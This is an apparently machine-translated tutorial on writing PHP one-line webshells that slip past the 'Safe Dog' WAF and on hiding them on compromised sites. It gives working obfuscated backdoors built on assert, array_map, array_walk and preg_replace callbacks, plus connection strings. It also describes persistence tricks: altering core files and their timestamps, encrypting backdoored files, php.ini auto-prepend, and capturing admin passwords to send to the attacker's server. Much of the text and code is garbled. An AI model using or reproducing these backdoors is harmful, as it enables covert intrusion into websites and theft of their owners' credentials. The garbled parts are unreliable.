PHP A word back door over dog posture after thousands of doors structure and hide

The second chapter mainly gives you some back door construction ideas, and the Security dog file feature detection mechanism.

In addition, this article requires you to have a certain understanding of PHP.

This chapter is divided into three parts, the first part of the basic, the analysis of the implementation process of the chopper PHP code, the basis of the second part of the main summary of some of the back door posture can be used, this part of my main to share some of the back door collection, I hope to expand our thinking;

Statement: In the back door for example, most of the back door structure and ideas, may have similar online, if there is the same, to hit me!

At present, the mainstream WAF software (such as security dogs) generally for backdoor files have active Avira and passive avira, active good understanding, passive is mainly in your access to the file, the file on the line Avira, such as the time to link the chopper.

Because the safe dog to the backdoor killing is actually a pre-compilation of code, remove the comments and other useless code, encountered if, directly check if internal content.

Security dog get other kinds of WAF have what kind of characteristic library, we can not know all, we can do only a little try, WAF is always in the update, black wide door forever in the change of routines, almost no once and for all back door.

Description: If you want to better over the dog, then PHP must be, in order to try to take care of the students will not PHP, this article share some wretched ideas to make up.

Let's start with the simplest dog-back.

Here are a few words to share can be directly over the dog, although very simple, but before we take a walk of the dog.

<?php $_get[a] ($_get[b]);? >

This sentence has been able to carry out all orders, but must be killed,

We can use the Extract function to simply process the requested data.

Of course, to perfect the dog, to execute more commands, also need data layer processing, details refer to Chapter three.

The classic callback function

Many times it is not safe to give a variable a layer of encryption, in fact, many WAF is very sensitive to base64_decode.

For example:

@array_map (Base64_decode ($_request[' xx '), (array) base64_decode ($_request[' Sofia '));

Principle Analysis: The XX parameter is passed directly to an assert function, and the Sofia parameter is passed into assert (eval (' Execute code ')).

Array_map directly out of the back door, try to remove the base64?

Yes, so simple, the most dangerous place is the safest place, at least the file characteristics of the security dog did not detect it.

However, this sentence D shield is level four, because a little bit of people can see is a back door.

But the actual sense of the dog is still far from enough, but also need data processing, the details of the third chapter. After that, you'll find that this sentence modifies the post data to complete the dog.

Do not sell Xiaoguanzi:

@array_map (Assert, (array) base64_decode ($_request[' Sofia '));

Connection method: test.php?sofia=yxnzzxj0kcrfukvrvuvtvfsndnvsbiddkq== Password: vuln

One more callback back door.

< $Base = "Base6". " 4 "." _decod "." E "; $_clasc = $Base ($_request[' vuln ')); $arr = Array ($Base ($_post[' sofia ']) = | *|e ',); @array_walk ($arr, $_CLASC, ");? > This is a version I modified earlier, here is actually the preg_replace back door, but also through the callback function implementation, also can pass:

Detailed: Bring in Parameters:

VULN=CHJLZ19YZXBSYWNL (Preg_replace)

SOFIA=CGHWAW5MBYGP (Phpinfo ())

< $Base = "Base6". " 4 "." _decod "." E "; $_clasc = $Base ($_request[' vuln ');//$_clasc=preg_replace$arr = Array ($Base ($_post[' sofia ']) = | *|e ',); $arr = Array (' phpinfo () ' = ' |. *|e ') @array_walk ($arr, $_CLASC, "); Preg_replace (' |. *|e ', phpinfo (), ')?>

There are a lot of ready-made callback functions on the Internet or other ways to detect features, and then do not repeat the wheel.

Code-behind

Permission to maintain is also an important part of infiltration, hidden in place the next day off the right, wretched back door can be followed forever.

Method One: Remote read or include file

This method is more common, such as:

<?php
if ($_post[' token '] = = ' Sofia ') {
Require ' home/wwwlogs/access.log ';
}

But personally, I see a ghost at a glance, which normal program will be ghost animal to contain a log file or picture, of course, depending on the scene.

Method Two:

Put the code into the core function file, do the file time modification, as long as the killing does not come out, the general webmaster will not move the core files, is also a certain concealment,

Method Two: Create a class or function, separate the backdoor code

This is basically very difficult to kill, such as the global_function.php class of the file to create a class, or function, in the call of the core function of the relevant file to instantiate a class, call the function, then is also properly executed.

such as: Put class into the core class file, in the relevant call file into the execution code, concealment will be strengthened a lot.

<?php
Class Parse_args {

Public Function Apply_filters ($key) {
ASSERT ($key);
}
}

Execute code
@extract ($_request);
$reflectionMethod = new Parse_args ();
$reflectionMethod-apply_filters ($s 0fia);

?>

Method Four: Direct encryption code

Encrypt the backdoor file directly,

In fact, this is just the result of Eval ($_post[x]) encryption, what else do I need to construct? However, the usability is not very high in the infiltration process, many times to write the backdoor code, which can not be written at all, only as a means of maintenance.

Method Five: Create a manual backdoor

PHP can not only get get,post data, but also can get the server data, such as User-agent,referrer,cookie,client IP, so we can fully add in these parameters need to execute the code, However, it is important to note that some of the parameters log will be recorded, here only to provide ideas, everyone according to the actual situation to play.

Method Five: Indirectly maintain background permissions,

Can be directly in the background landing page included in the core function to add the code to get the user name password, such as directly generated into a TXT on the local server (can be encrypted), remember the hidden URL, from time to time there will be a password record, or remote post password to their own server.

You can insert an XSS in the background page, which is relatively inefficient, but is also a way of thinking.

Method Six: Come on hard

This method only for small and medium-sized webmaster, find a site's core but not commonly used files, such as lang files, and so on, will be the back door to join, and then the entire file encryption, and then replace the source files, the function of all normal, webmaster on such files will not be too much suspicion.

This idea can also be combined with method three.

Method Seven: PHP.ini back door

Modify the php.ini configuration to achieve each page to execute a backdoor, each PHP is a backdoor, such as can be configured Auto_prepend_file, automatic loading of a file, this part of the later time to write out separately.

PHP A word back door over dog posture after thousands of doors structure and hide